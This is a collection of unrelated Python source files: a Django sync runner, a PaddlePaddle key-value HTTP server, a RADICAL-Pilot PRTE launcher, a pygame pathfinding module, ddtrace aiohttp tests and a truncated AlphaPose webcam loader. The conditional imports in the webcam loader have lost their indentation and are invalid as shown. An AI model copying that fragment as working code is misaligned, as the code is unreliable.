fulcrum_task_runner.py | from __future__ import absolute_import
from hashlib import md5
from django.core.cache import cache
from multiprocessing import Process
import time
import django
from django.core.exceptions import AppRegistryNotReady, ImproperlyConfigured
from django.db import OperationalError
import json
class FulcrumTaskRunner:
    """Background runner that periodically syncs Fulcrum layers and S3 data.

    A shared cache entry acts as a cross-process lock/refcount so that only
    one polling loop runs even when several processes call start().
    """
    def __init__(self):
        name = "FulcrumTasks"
        # hashlib requires bytes on Python 3; encode explicitly so the same
        # lock id is produced on both Python 2 and 3.
        file_name_hexdigest = md5(name.encode('utf-8')).hexdigest()
        self.lock_id = '{0}-lock-{1}'.format(name, file_name_hexdigest)
    def start(self, interval=30):
        """Calls Run() sets an interval time
        Args:
            interval: An integer in seconds for the polling interval.
        """
        # Only the process that created the lock runs the polling loop.
        if self.add_lock():
            process = Process(target=self.run, args=(interval,))
            process.daemon = True
            process.start()
    def run(self, interval):
        """Checks the 'lock' from the cache if using multiprocessing module, update if it exists.
        Args:
            interval: An integer in seconds for the polling interval.
        """
        while self.is_locked():
            try:
                from .tasks import task_update_layers, pull_s3_data
            except AppRegistryNotReady:
                # Django apps not loaded yet (early startup); initialize then retry.
                django.setup()
                from .tasks import task_update_layers, pull_s3_data
            try:
                try:
                    from django.contrib.auth.models import User
                except ImproperlyConfigured:
                    pass
                # Only do work once the initial (id=1) user exists.
                if User.objects.filter(id=1):
                    print("Updating Layers...")
                    task_update_layers()
                    print("Pulling S3 Data...")
                    pull_s3_data()
            except OperationalError as e:
                # Database may not be reachable yet; log and retry next cycle.
                print("Database isn't ready yet.")
                # Exceptions have no .message attribute on Python 3; use str().
                print(str(e))
                print(e.args)
            time.sleep(interval)
    def stop(self):
        """Removes the 'lock' from the cache if using multiprocessing module."""
        cache.delete(self.lock_id)
    def add_lock(self):
        """Adds a lock to a queue so multiple processes don't break the lock.

        Returns:
            True if this call created the lock (caller should start the loop),
            False if another runner already holds it (refcount incremented).
        """
        if cache.add(self.lock_id, json.dumps(['lock']), timeout=None):
            return True
        else:
            old_value = json.loads(cache.get(self.lock_id))
            cache.set(self.lock_id, json.dumps(old_value + ['lock']))
            return False
    def is_locked(self):
        """Checks the lock."""
        if cache.get(self.lock_id):
            return True
        return False
    def remove_lock(self):
        """Removes a lock to a queue so multiple processes don't break the lock."""
        raw = cache.get(self.lock_id)
        if raw is None:
            # Lock already gone (stop() was called, or it was never acquired);
            # json.loads(None) would raise here otherwise.
            return
        lock = json.loads(raw)
        if len(lock) <= 1:
            cache.delete(self.lock_id)
        else:
            cache.set(self.lock_id, json.dumps(lock[:-1]))
    def __del__(self):
        """Used to remove the placeholder on the cache if using the multiprocessing module."""
        self.remove_lock()
|
http_server.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Http Server."""
import logging
import BaseHTTPServer
import SimpleHTTPServer
import time
import threading
import socket
def get_logger(name, level, fmt):
    """Create a logger that writes to ``http.log`` using *level* and *fmt*."""
    log = logging.getLogger(name)
    log.setLevel(level)
    # mode='w' truncates any previous log on each fresh logger creation.
    file_handler = logging.FileHandler('http.log', mode='w')
    file_handler.setFormatter(logging.Formatter(fmt=fmt))
    log.addHandler(file_handler)
    return log
# Module-level logger shared by all handlers.  Note: creating it truncates /
# creates ``http.log`` as an import-time side effect of get_logger().
_http_server_logger = get_logger(
    __name__, logging.INFO, fmt='%(asctime)s-%(levelname)s: %(message)s')
class KVHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    """
    kv handler class for kv http server,
    it defines the way to get/set kv in server.

    Request paths have the form /<scope>/<key>; values are raw bytes.
    """
    def do_GET(self):
        """
        get method for kv handler, get value according to key.
        """
        log_str = "GET " + self.address_string() + self.path
        paths = self.path.split('/')
        # Require exactly /<scope>/<key>: any other segment count would make
        # the unpack below raise ValueError (the old `< 3` check let paths
        # with extra segments crash the handler).
        if len(paths) != 3:
            print('len of request path must be 3: ' + self.path)
            self.send_status_code(400)
            return
        _, scope, key = paths
        with self.server.kv_lock:
            value = self.server.kv.get(scope, {}).get(key)
        if value is None:
            log_str += ' , key not found: ' + key
            self.send_status_code(404)
        else:
            log_str += ' , key found: ' + key
            self.send_response(200)
            self.send_header("Content-Length", str(len(value)))
            self.end_headers()
            self.wfile.write(value)
        _http_server_logger.info(log_str)
    def do_PUT(self):
        """
        put method for kv handler, set value according to key.
        """
        log_str = "PUT " + self.address_string() + self.path
        paths = self.path.split('/')
        if len(paths) != 3:
            print('len of request path must be 3: ' + self.path)
            self.send_status_code(400)
            return
        _, scope, key = paths
        content_length = int(self.headers['Content-Length'])
        try:
            value = self.rfile.read(content_length)
        except Exception:
            # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
            # are no longer swallowed.
            print("receive error invalid request")
            self.send_status_code(404)
            return
        with self.server.kv_lock:
            if self.server.kv.get(scope) is None:
                self.server.kv[scope] = {}
            self.server.kv[scope][key] = value
        self.send_status_code(200)
        _http_server_logger.info(log_str)
    def do_DELETE(self):
        """
        delete method for kv handler, set value according to key.
        """
        log_str = "DELETE " + self.address_string() + self.path
        paths = self.path.split('/')
        if len(paths) != 3:
            print('len of request path must be 3: ' + self.path)
            self.send_status_code(400)
            return
        _, scope, key = paths
        with self.server.delete_kv_lock:
            if self.server.delete_kv.get(scope) is None:
                self.server.delete_kv[scope] = []
            self.server.delete_kv[scope].append(key)
        self.send_status_code(200)
        _http_server_logger.info(log_str)
    def log_message(self, format, *args):
        """
        ignore all logging messages in kv handler.
        """
        pass
    def send_status_code(self, code):
        """
        send status code back to client.
        """
        self.send_response(code)
        self.send_header("Content-Length", 0)
        self.end_headers()
class KVHTTPServer(BaseHTTPServer.HTTPServer, object):
    """
    it is a http server storing kv pairs.
    """
    def __init__(self, port, handler):
        """Init: listen on all interfaces at *port* with *handler*."""
        super(KVHTTPServer, self).__init__(('', port), handler)
        # delete_kv maps scope -> list of keys deleted in that scope.
        self.delete_kv_lock = threading.Lock()
        self.delete_kv = {}
        # kv maps scope -> {key: value} for live entries.
        self.kv_lock = threading.Lock()
        self.kv = {}
    def get_deleted_size(self, key):
        """
        get deleted size in key.

        Returns the number of keys deleted in scope *key* (0 when none).
        """
        with self.delete_kv_lock:
            # delete_kv stores a LIST of deleted keys per scope; the previous
            # implementation returned the list itself instead of its length,
            # so KVServer.should_stop() compared a list against an int.
            return len(self.delete_kv.get(key, []))
class KVServer:
    """
    it is a server storing kv pairs, has a http server inside.
    """
    def __init__(self, port, size=None):
        """Init.

        Args:
            port: TCP port for the embedded HTTP server.
            size: optional {scope: expected_delete_count} map consulted by
                should_stop().  The previous version both used a shared
                mutable dict as the default and silently ignored the
                argument (``self.size`` was always reset to ``{}``).
        """
        self.http_server = KVHTTPServer(port, KVHandler)
        self.listen_thread = None
        self.size = {} if size is None else size
    def start(self):
        """
        start server until user calls stop to let it quit.
        """
        self.listen_thread = threading.Thread(
            target=lambda: self.http_server.serve_forever())
        self.listen_thread.start()
    def stop(self):
        """
        stop server and clear its resources.
        """
        self.http_server.shutdown()
        self.listen_thread.join()
        self.http_server.server_close()
    def should_stop(self):
        """
        return whether the server should stop.
        Returns:
            ret(bool): whether the server should stop
        """
        # Stop once every scope has seen the expected number of deletes.
        for key in self.size:
            s = self.http_server.get_deleted_size(key)
            if s != self.size.get(key, 0):
                return False
        return True
|
prte.py |
__copyright__ = "Copyright 2016, http://radical.rutgers.edu"
__license__ = "MIT"
import logging
import os
import signal
import subprocess as mp
import threading as mt
import time

import radical.utils as ru

from .base import LaunchMethod
# ------------------------------------------------------------------------------
#
class PRTE(LaunchMethod):
    """PRRTE-based launch method: a persistent DVM is started with ``prte``
    (rm_config_hook) and tasks are launched into it with ``prun``
    (construct_command)."""
    # --------------------------------------------------------------------------
    #
    def __init__(self, name, cfg, session):
        LaunchMethod.__init__(self, name, cfg, session)
        # We remove all PRUN related environment variables from the launcher
        # environment, so that we can use PRUN for both launch of the
        # (sub-)agent and CU execution.
        self.env_removables.extend(["OMPI_", "OPAL_", "PMIX_"])
        self._verbose = bool(os.environ.get('RADICAL_PILOT_PRUN_VERBOSE'))
    # --------------------------------------------------------------------------
    #
    @classmethod
    def rm_config_hook(cls, name, cfg, rm, log, profiler):
        """Start the PRRTE DVM for this pilot and return its contact info.

        Returns an ``lm_info`` dict (dvm_uri, version_info, cvd_id_mode)
        which the ResourceManager passes back to LaunchMethod instances via
        the scheduler slots.  Raises when prte/stdbuf are missing or the DVM
        URI never appears.
        """
        prte = ru.which('prte')
        if not prte:
            raise Exception("Couldn't find prte")
        # Now that we found the prte, get PRUN version
        out, _, _ = ru.sh_callout('prte_info | grep "Open RTE"', shell=True)
        prte_info = dict()
        for line in out.split('\n'):
            line = line.strip()
            if 'Open RTE:' in line:
                prte_info['version'] = line.split(':')[1].strip()
            elif 'Open RTE repo revision:' in line:
                prte_info['version_detail'] = line.split(':')[1].strip()
        log.info("Found Open RTE: %s [%s]",
                 prte_info.get('version'), prte_info.get('version_detail'))
        # write hosts file
        furi = '%s/prrte.uri' % os.getcwd()
        fhosts = '%s/prrte.hosts' % os.getcwd()
        vm_size = len(rm.node_list)
        with open(fhosts, 'w') as fout:
            for node in rm.node_list:
                fout.write('%s slots=%d\n' % (node[0],
                           rm.cores_per_node * rm.smt))
        pre = os.environ['PRRTE_PREFIX']
        prte += ' --prefix %s' % pre
        prte += ' --report-uri %s' % furi
        prte += ' --hostfile %s' % fhosts
        if profiler.enabled:
            prte += ' --pmca orte_state_base_verbose 1'  # prte profiling
        # large tasks imply large message sizes, and we need to account for that
        # FIXME: we should derive the message size from DVM size - smaller DVMs
        #        will never need large messages, as they can't run large tasks)
        prte += ' --pmca ptl_base_max_msg_size %d' % (1024 * 1024 * 1024 * 1)
        # prte += ' --pmca rmaps_base_verbose 5'
        # debug mapper problems for large tasks
        if log.isEnabledFor(logging.DEBUG):
            prte += ' -pmca orte_rmaps_base_verbose 100'
        # we apply two temporary tweaks on Summit which should not be needed in
        # the long run:
        #
        # avoid 64 node limit (ssh connection limit)
        prte += ' --pmca plm_rsh_no_tree_spawn 1'
        # ensure 1 ssh per dvm
        prte += ' --pmca plm_rsh_num_concurrent %d' % vm_size
        # Use (g)stdbuf to disable buffering.  We need this to get the
        # "DVM ready" message to ensure DVM startup completion
        #
        # The command seems to be generally available on our Cray's,
        # if not, we can code some home-coooked pty stuff (TODO)
        stdbuf_cmd = ru.which(['stdbuf', 'gstdbuf'])
        if not stdbuf_cmd:
            raise Exception("Couldn't find (g)stdbuf")
        stdbuf_arg = "-oL"
        # Base command = (g)stdbuf <args> + prte + prte-args + debug_args
        cmdline = '%s %s %s ' % (stdbuf_cmd, stdbuf_arg, prte)
        # cmdline = prte
        # Additional (debug) arguments to prte
        verbose = bool(os.environ.get('RADICAL_PILOT_PRUN_VERBOSE'))
        if verbose:
            debug_strings = [
                '--debug-devel',
                '--pmca odls_base_verbose 100',
                '--pmca rml_base_verbose 100',
            ]
        else:
            debug_strings = []
        # Split up the debug strings into args and add them to the cmdline
        cmdline += ' '.join(debug_strings)
        cmdline = cmdline.strip()
        log.info("Start prte on %d nodes [%s]", vm_size, cmdline)
        profiler.prof(event='dvm_start', uid=cfg['pid'])
        dvm_uri = None
        dvm_process = mp.Popen(cmdline.split(), stdout=mp.PIPE,
                               stderr=mp.STDOUT)
        # ----------------------------------------------------------------------
        def _watch_dvm():
            # Forward DVM output to the log and escalate an abnormal exit.
            log.info('starting prte watcher')
            retval = dvm_process.poll()
            while retval is None:
                line = dvm_process.stdout.readline().strip()
                if line:
                    log.debug('prte output: %s', line)
                else:
                    time.sleep(1.0)
            if retval != 0:
                # send a kill signal to the main thread.
                # We know that Python and threading are likely not to play well
                # with signals - but this is an exceptional case, and not part
                # of the stadard termination sequence.  If the signal is
                # swallowed, the next `prun` call will trigger
                # termination anyway.
                # BUG FIX: os.kill() requires a signal argument; calling it
                # with only a pid raised TypeError instead of signalling.
                os.kill(os.getpid(), signal.SIGTERM)
                raise RuntimeError('PRTE DVM died')
            log.info('prte stopped (%d)', dvm_process.returncode)
        # ----------------------------------------------------------------------
        dvm_watcher = mt.Thread(target=_watch_dvm)
        dvm_watcher.daemon = True
        dvm_watcher.start()
        # Poll for the DVM URI file the freshly started prte writes.
        for _ in range(100):
            time.sleep(0.5)
            try:
                with open(furi, 'r') as fin:
                    for line in fin.readlines():
                        if '://' in line:
                            dvm_uri = line.strip()
                            break
            except Exception as e:
                log.debug('DVM check: uri file missing: %s...' % str(e)[:24])
                time.sleep(0.5)
            if dvm_uri:
                break
        if not dvm_uri:
            raise Exception("VMURI not found!")
        log.info("prte startup successful: [%s]", dvm_uri)
        # in some cases, the DVM seems to need some additional time to settle.
        # FIXME: this should not be needed, really
        time.sleep(10)
        profiler.prof(event='dvm_ok', uid=cfg['pid'])
        lm_info = {
            'dvm_uri'     : dvm_uri,
            'version_info': prte_info,
            'cvd_id_mode' : 'physical'
        }
        # we need to inform the actual LaunchMethod instance about the prte URI.
        # So we pass it back to the ResourceManager which will keep it in an
        # 'lm_info', which will then be passed as part of the slots via the
        # scheduler
        return lm_info
    # --------------------------------------------------------------------------
    #
    @classmethod
    def rm_shutdown_hook(cls, name, cfg, rm, lm_info, log, profiler):
        """
        This hook is symmetric to the config hook above, and is called during
        shutdown sequence, for the sake of freeing allocated resources.
        """
        if 'dvm_uri' in lm_info:
            try:
                log.info('terminating prte')
                prun = ru.which('prun')
                if not prun:
                    raise Exception("Couldn't find prun")
                ru.sh_callout('%s --hnp %s --terminate'
                              % (prun, lm_info['dvm_uri']))
                profiler.prof(event='dvm_stop', uid=cfg['pid'])
            except Exception as e:
                # use the same event name as for runtime failures - those are
                # not distinguishable at the moment from termination failures
                profiler.prof(event='dvm_fail', uid=cfg['pid'], msg=e)
                log.exception('prte termination failed')
    # --------------------------------------------------------------------------
    #
    def _configure(self):
        # ensure that `prun` is in the path (`which` will raise otherwise)
        ru.which('prun')
        self.launch_command = 'prun'
    # --------------------------------------------------------------------------
    #
    def construct_command(self, cu, launch_script_hop):
        """Build the ``prun`` command line for compute unit *cu*.

        Returns (command, None); raises RuntimeError when the slots carry no
        DVM contact information.
        """
        # NOTE(review): purpose of this delay is not evident from the code —
        # presumably throttles prun submission rate; confirm.
        time.sleep(0.1)
        slots = cu['slots']
        cud = cu['description']
        task_exec = cud['executable']
        task_env = cud.get('environment') or dict()
        task_args = cud.get('arguments') or list()
        task_argstr = self._create_arg_string(task_args)
        n_threads = cu['description'].get('cpu_threads', 1)
        n_procs = cu['description'].get('cpu_processes', 1)
        if not n_procs : n_procs = 1
        if not n_threads: n_threads = 1
        self._log.debug('prep %s', cu['uid'])
        if 'lm_info' not in slots:
            raise RuntimeError('No lm_info to launch via %s: %s'
                               % (self.name, slots))
        if not slots['lm_info']:
            raise RuntimeError('lm_info missing for %s: %s'
                               % (self.name, slots))
        if 'dvm_uri' not in slots['lm_info']:
            raise RuntimeError('dvm_uri not in lm_info for %s: %s'
                               % (self.name, slots))
        dvm_uri = slots['lm_info']['dvm_uri']
        if task_argstr: task_command = "%s %s" % (task_exec, task_argstr)
        else          : task_command = task_exec
        env_string = ''
        env_list = self.EXPORT_ENV_VARIABLES + list(task_env.keys())
        if env_list:
            for var in env_list:
                env_string += '-x "%s" ' % var
        map_flag = ' -np %d --cpus-per-proc %d' % (n_procs, n_threads)
        map_flag += ' --bind-to hwthread:overload-allowed --use-hwthread-cpus'
        map_flag += ' --oversubscribe'
        # see DVM startup
        map_flag += ' --pmca ptl_base_max_msg_size %d' % (1024 * 1024 * 1024 * 1)
        # map_flag += ' --pmca rmaps_base_verbose 5'
        if 'nodes' not in slots:
            # this task is unscheduled - we leave it to PRRTE/PMI-X to
            # correctly place the task
            pass
        else:
            # FIXME: ensure correct binding for procs and threads via slotfile
            # enact the scheduler's host placement.  For now, we leave socket,
            # core and thread placement to the prted, and just add all process
            # slots to the host list.
            hosts = ''
            for node in slots['nodes']:
                hosts += '%s,' % node['name']
            # remove trailing ','
            map_flag += ' -host %s' % hosts.rstrip(',')
        # Additional (debug) arguments to prun
        debug_string = ''
        if self._verbose:
            debug_string += ' '.join([
                '-verbose',
                # '--debug-devel',
                # '-display-devel-map',
                # '-display-allocation',
                '--report-bindings',
            ])
        # env_string = ''  # FIXME
        command = '%s --hnp "%s" %s %s %s %s' % (self.launch_command,
                  dvm_uri, map_flag, debug_string, env_string, task_command)
        return command, None
# ------------------------------------------------------------------------------
|
Algorithm.py | import pygame
import threading
from queue import PriorityQueue
from pygame.locals import *
import Commons
import Position
import GameWindow
def CalculatePathBasedOnCurrentAlgorithm(tree, start, end, window):
    """Run the selected search (A* or uniform-cost) from *start* to *end*.

    Colors explored cells, highlights the final path in yellow, and renders
    the visited-node / path-weight stats once the end cell is reached.
    Returns without rendering stats when no path exists.
    """
    isCurrentAlgorithmAStar = Commons.CurrentAlgorithm == Commons.A_ALGORITHM
    queue = PriorityQueue()
    exploredPositions = set()
    queue.put((0, start, [start]))
    exploredPositions.add(start)
    # The start node's own weight must not count towards the path total.
    pathWeight = -start.weight
    positionDictionary = {start: 0}
    # BUG FIX: a PriorityQueue instance is always truthy, so `while queue:`
    # never terminates; when no path exists the loop would reach an empty
    # queue and queue.get() would block forever.  Test emptiness explicitly.
    while not queue.empty():
        # NOTE(review): ties on cost fall back to comparing Position objects
        # inside the heap — Position must support `<`; confirm.
        weight, position, currentPath = queue.get()
        position.ColorPosition(Commons.ORANGE)
        if position != start and isCurrentAlgorithmAStar:
            # Strip the heuristic component to recover the true path cost.
            weight -= CalculateManhattanDistance(position, end)
        if position == end:
            for pos in currentPath:
                pos.ColorPosition(Commons.YELLOW)
                pathWeight += pos.weight
            visitedNodes = str(len(exploredPositions) - queue.qsize())
            RenderTexts(window, visitedNodes, str(pathWeight))
            GameWindow.DrawWindow(window, tree)
            return
        for i in range(len(position.neighbors)):
            if isCurrentAlgorithmAStar:
                cost = weight + position.neighbors[i].weight + CalculateManhattanDistance(position.neighbors[i], end)
            else:
                cost = weight + position.neighbors[i].weight
            if position.neighbors[i] not in exploredPositions:
                queue.put((cost, position.neighbors[i], currentPath + [position.neighbors[i]]))
                exploredPositions.add(position.neighbors[i])
                position.neighbors[i].ColorPosition(Commons.BLACK)
                positionDictionary[position.neighbors[i]] = cost
            elif positionDictionary[position.neighbors[i]] > cost and isCurrentAlgorithmAStar:
                # Found a cheaper route to an already-seen cell: re-queue it.
                queue.put((cost, position.neighbors[i], currentPath + [position.neighbors[i]]))
                position.neighbors[i].ColorPosition(Commons.BLACK)
                positionDictionary[position.neighbors[i]] = cost
        thread = threading.Thread(target=GameWindow.DrawWindow, args=[window, tree, False])
        thread.start()
        thread.join()
        # Keep the window responsive and allow the user to quit mid-search.
        for event in pygame.event.get():
            if event.type == pygame.KEYDOWN:
                if event.key == pygame.K_ESCAPE:
                    Commons.QuitGame()
            if event.type == pygame.QUIT:
                Commons.QuitGame()
def CalculateManhattanDistance(position, end):
    """Return the Manhattan (taxicab) distance between two grid positions."""
    row_delta = abs(end.row - position.row)
    column_delta = abs(end.column - position.column)
    return row_delta + column_delta
def RenderTexts(window, visitedNodes, pathWeight):
    """Re-create the game window with a stats bar and draw both stat texts."""
    # The window is re-created 30px taller to make room for the text row.
    window = pygame.display.set_mode((Commons.GAME_WIDTH, Commons.GAME_WIDTH + 30))
    window.fill(Commons.LIGHT_BLACK)
    text_row_y = Commons.GAME_WIDTH + 10
    for text, x_offset in ((Commons.VISITED_NODES + visitedNodes, 5),
                           (Commons.PATH_TOTAL_WEIGHT + pathWeight, 130)):
        Commons.RenderText(window, text, (x_offset, text_row_y))
test_request.py | # flake8: noqa
import threading
import asyncio
import aiohttp_jinja2
from urllib import request
from nose.tools import eq_
from aiohttp.test_utils import unittest_run_loop
from ddtrace.pin import Pin
from ddtrace.constants import EVENT_SAMPLE_RATE_KEY
from ddtrace.contrib.aiohttp.patch import patch, unpatch
from ddtrace.contrib.aiohttp.middlewares import trace_app
from .utils import TraceTestCase
class TestRequestTracing(TraceTestCase):
    """
    Ensures that the trace includes all traced components.

    Each test drives the aiohttp test client against the app set up by
    TraceTestCase and inspects the spans collected by the dummy tracer.
    """
    def enable_tracing(self):
        # enabled tracing:
        #   * middleware
        #   * templates
        trace_app(self.app, self.tracer)
        patch()
        Pin.override(aiohttp_jinja2, tracer=self.tracer)
    def disable_tracing(self):
        # Undo the aiohttp patching applied in enable_tracing().
        unpatch()
    @unittest_run_loop
    @asyncio.coroutine
    def test_full_request(self):
        # it should create a root span when there is a handler hit
        # with the proper tags
        request = yield from self.client.request('GET', '/template/')
        eq_(200, request.status)
        yield from request.text()
        # the trace is created
        traces = self.tracer.writer.pop_traces()
        eq_(1, len(traces))
        eq_(2, len(traces[0]))
        request_span = traces[0][0]
        template_span = traces[0][1]
        # request
        eq_('aiohttp-web', request_span.service)
        eq_('aiohttp.request', request_span.name)
        eq_('GET /template/', request_span.resource)
        # template
        eq_('aiohttp-web', template_span.service)
        eq_('aiohttp.template', template_span.name)
        eq_('aiohttp.template', template_span.resource)
    @unittest_run_loop
    @asyncio.coroutine
    def test_event_sample_rate(self):
        # it should create a root span when there is a handler hit
        # with the proper tags
        with self.override_config('aiohttp', dict(event_sample_rate=1)):
            request = yield from self.client.request('GET', '/template/')
            eq_(200, request.status)
            yield from request.text()
        # Assert root span sets the appropriate metric
        root = self.get_root_span()
        root.assert_matches(
            name='aiohttp.request',
            metrics={
                EVENT_SAMPLE_RATE_KEY: 1,
            },
        )
        # Assert non-root spans do not have this metric set
        for span in self.spans:
            if span == root:
                continue
            self.assertIsNone(span.get_metric(EVENT_SAMPLE_RATE_KEY))
    @unittest_run_loop
    @asyncio.coroutine
    def test_multiple_full_request(self):
        # it should handle multiple requests using the same loop
        def make_requests():
            # Blocking urllib call, executed off-loop in worker threads.
            url = self.client.make_url('/delayed/')
            response = request.urlopen(str(url)).read().decode('utf-8')
            eq_('Done', response)
        # blocking call executed in different threads
        threads = [threading.Thread(target=make_requests) for _ in range(10)]
        for t in threads:
            t.daemon = True
            t.start()
        # we should yield so that this loop can handle
        # threads' requests
        yield from asyncio.sleep(0.5)
        for t in threads:
            t.join(timeout=0.5)
        # the trace is created
        traces = self.tracer.writer.pop_traces()
        eq_(10, len(traces))
        eq_(1, len(traces[0]))
|
dataloader_webcam.py | import os
import torch
from torch.autograd import Variable
import torch.utils.data as data
import torchvision.transforms as transforms
from PIL import Image, ImageDraw
from SPPE.src.utils.img import load_image, cropBox, im_to_torch
from opt import opt
from yolo.preprocess import prep_image, prep_frame, inp_to_image
from pPose_nms import pose_nms, write_json
from SPPE.src.utils.eval import getPrediction
from yolo.util import write_results, dynamic_write_results
from yolo.darknet import Darknet
from tqdm import tqdm
import cv2
import json
import numpy as np
import sys
import time
import torch.multiprocessing as mp
from multiprocessing import Process
from multiprocessing import Queue as pQueue
from threading import Thread
# import the Queue class from Python 3
if sys.version_info >= (3, 0):
from queue import Queue, LifoQueue
# otherwise, import the Queue class for Python 2.7
else:
from Queue import Queue, LifoQueue
if opt.vis_fast:
from fn import vis_frame_fast as vis_frame
else:
from fn import vis_frame
class WebcamLoader:
    """Threaded webcam reader that batches preprocessed frames into a queue.

    A LifoQueue is used so consumers always see the most recent batch; when
    the queue fills up it is cleared wholesale, dropping stale frames.
    """
    def __init__(self, webcam, batchSize=1, queueSize=256):
        # initialize the file video stream along with the boolean
        # used to indicate if the thread should be stopped or not
        self.stream = cv2.VideoCapture(int(webcam))
        assert self.stream.isOpened(), 'Cannot capture source'
        self.stopped = False
        # initialize the queue used to store frames read from
        # the video file
        self.batchSize = batchSize
        self.Q = LifoQueue(maxsize=queueSize)
    def start(self):
        # start a thread to read frames from the file video stream
        t = Thread(target=self.update, args=())
        t.daemon = True
        t.start()
        return self
    def update(self):
        # keep looping infinitely
        i = 0
        while True:
            # otherwise, ensure the queue has room in it
            if not self.Q.full():
                img = []
                orig_img = []
                im_name = []
                im_dim_list = []
                for k in range(self.batchSize):
                    (grabbed, frame) = self.stream.read()
                    # if the `grabbed` boolean is `False`, then we have
                    # reached the end of the video file
                    if not grabbed:
                        self.stop()
                        return
                    inp_dim = int(opt.inp_dim)
                    img_k, orig_img_k, im_dim_list_k = prep_frame(frame, inp_dim)
                    img.append(img_k)
                    orig_img.append(orig_img_k)
                    # Frames are named by a running counter, e.g. "0.jpg".
                    im_name.append(str(i)+'.jpg')
                    im_dim_list.append(im_dim_list_k)
                with torch.no_grad():
                    # Human Detection
                    img = torch.cat(img)
                    im_dim_list = torch.FloatTensor(im_dim_list).repeat(1,2)
                self.Q.put((img, orig_img, im_name, im_dim_list))
                i = i+1
            else:
                # Queue full: drop everything so consumers only see fresh
                # frames.  NOTE(review): clearing under Q.mutex bypasses the
                # queue's internal bookkeeping — confirm this is intentional.
                with self.Q.mutex:
                    self.Q.queue.clear()
    def videoinfo(self):
        # indicate the video info
        fourcc=int(self.stream.get(cv2.CAP_PROP_FOURCC))
        fps=self.stream.get(cv2.CAP_PROP_FPS)
        frameSize=(int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)),int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
        return (fourcc,fps,frameSize)
    def getitem(self):
        # return next frame in the queue
        return self.Q.get()
    def len(self):
        # return queue size
        return self.Q.qsize()
    def stop(self):
        # indicate that the thread should be stopped
        self.stopped = True
class DetectionLoader:
    """Threaded YOLO detector stage feeding box candidates downstream.

    Pulls frame batches from *dataloder* (a WebcamLoader), runs YOLOv3-SPP,
    rescales detections back to original image coordinates, and pushes
    (orig_img, im_name, boxes, scores, inps, pt1, pt2) tuples into a LIFO
    queue (None placeholders when nothing was detected in an image).
    """
    def __init__(self, dataloder, batchSize=1, queueSize=1024):
        # initialize the file video stream along with the boolean
        # used to indicate if the thread should be stopped or not
        self.det_model = Darknet("yolo/cfg/yolov3-spp.cfg")
        self.det_model.load_weights('models/yolo/yolov3-spp.weights')
        self.det_model.net_info['height'] = opt.inp_dim
        self.det_inp_dim = int(self.det_model.net_info['height'])
        # Network input resolution must be a multiple of 32 (YOLO stride).
        assert self.det_inp_dim % 32 == 0
        assert self.det_inp_dim > 32
        self.det_model.cuda()
        self.det_model.eval()
        self.stopped = False
        self.dataloder = dataloder
        self.batchSize = batchSize
        # initialize the queue used to store frames read from
        # the video file
        self.Q = LifoQueue(maxsize=queueSize)
    def start(self):
        # start a thread to read frames from the file video stream
        t = Thread(target=self.update, args=())
        t.daemon = True
        t.start()
        return self
    def update(self):
        # keep looping the whole dataset
        while True:
            img, orig_img, im_name, im_dim_list = self.dataloder.getitem()
            # Drop any stale frames so detection always runs on fresh input.
            with self.dataloder.Q.mutex:
                self.dataloder.Q.queue.clear()
            with torch.no_grad():
                # Human Detection
                img = img.cuda()
                prediction = self.det_model(img, CUDA=True)
                # NMS process
                dets = dynamic_write_results(prediction, opt.confidence,
                                    opt.num_classes, nms=True, nms_conf=opt.nms_thesh)
                if isinstance(dets, int) or dets.shape[0] == 0:
                    # No detections in this batch: emit a placeholder per image.
                    for k in range(len(orig_img)):
                        if self.Q.full():
                            time.sleep(2)
                        self.Q.put((orig_img[k], im_name[k], None, None, None, None, None))
                    continue
                dets = dets.cpu()
                # Column 0 of dets is the batch index of each detection.
                im_dim_list = torch.index_select(im_dim_list,0, dets[:, 0].long())
                scaling_factor = torch.min(self.det_inp_dim / im_dim_list, 1)[0].view(-1, 1)
                # coordinate transfer: undo letterbox padding and scaling to
                # map boxes back into original image coordinates
                dets[:, [1, 3]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 0].view(-1, 1)) / 2
                dets[:, [2, 4]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 1].view(-1, 1)) / 2
                dets[:, 1:5] /= scaling_factor
                # Clamp boxes to the original image bounds.
                for j in range(dets.shape[0]):
                    dets[j, [1, 3]] = torch.clamp(dets[j, [1, 3]], 0.0, im_dim_list[j, 0])
                    dets[j, [2, 4]] = torch.clamp(dets[j, [2, 4]], 0.0, im_dim_list[j, 1])
                boxes = dets[:, 1:5]
                scores = dets[:, 5:6]
                for k in range(len(orig_img)):
                    # Select the detections belonging to image k of the batch.
                    boxes_k = boxes[dets[:,0]==k]
                    if isinstance(boxes_k, int) or boxes_k.shape[0] == 0:
                        if self.Q.full():
                            time.sleep(2)
                        self.Q.put((orig_img[k], im_name[k], None, None, None, None, None))
                        continue
                    # Pre-allocate pose-network inputs and crop corner buffers;
                    # presumably filled downstream — confirm.
                    inps = torch.zeros(boxes_k.size(0), 3, opt.inputResH, opt.inputResW)
                    pt1 = torch.zeros(boxes_k.size(0), 2)
                    pt2 = torch.zeros(boxes_k.size(0), 2)
                    if self.Q.full():
                        time.sleep(2)
                    self.Q.put((orig_img[k], im_name[k], boxes_k, scores[dets[:,0]==k], inps, pt1, pt2))
    def read(self):
        # return next frame in the queue
        return self.Q.get()
    def len(self):
        # return queue len
        return self.Q.qsize()
class DetectionProcessor:
    """Threaded stage that crops detected people out of each frame and
    queues the crops for the pose-estimation network."""
    def __init__(self, detectionLoader, queueSize=1024):
        self.detectionLoader = detectionLoader
        # flag used to indicate if the thread should be stopped or not
        self.stopped = False
        # LIFO queue of processed (inps, orig_img, im_name, ...) tuples
        self.Q = LifoQueue(maxsize=queueSize)
    def start(self):
        # start a daemon thread (dies with the main process) running update()
        t = Thread(target=self.update, args=())
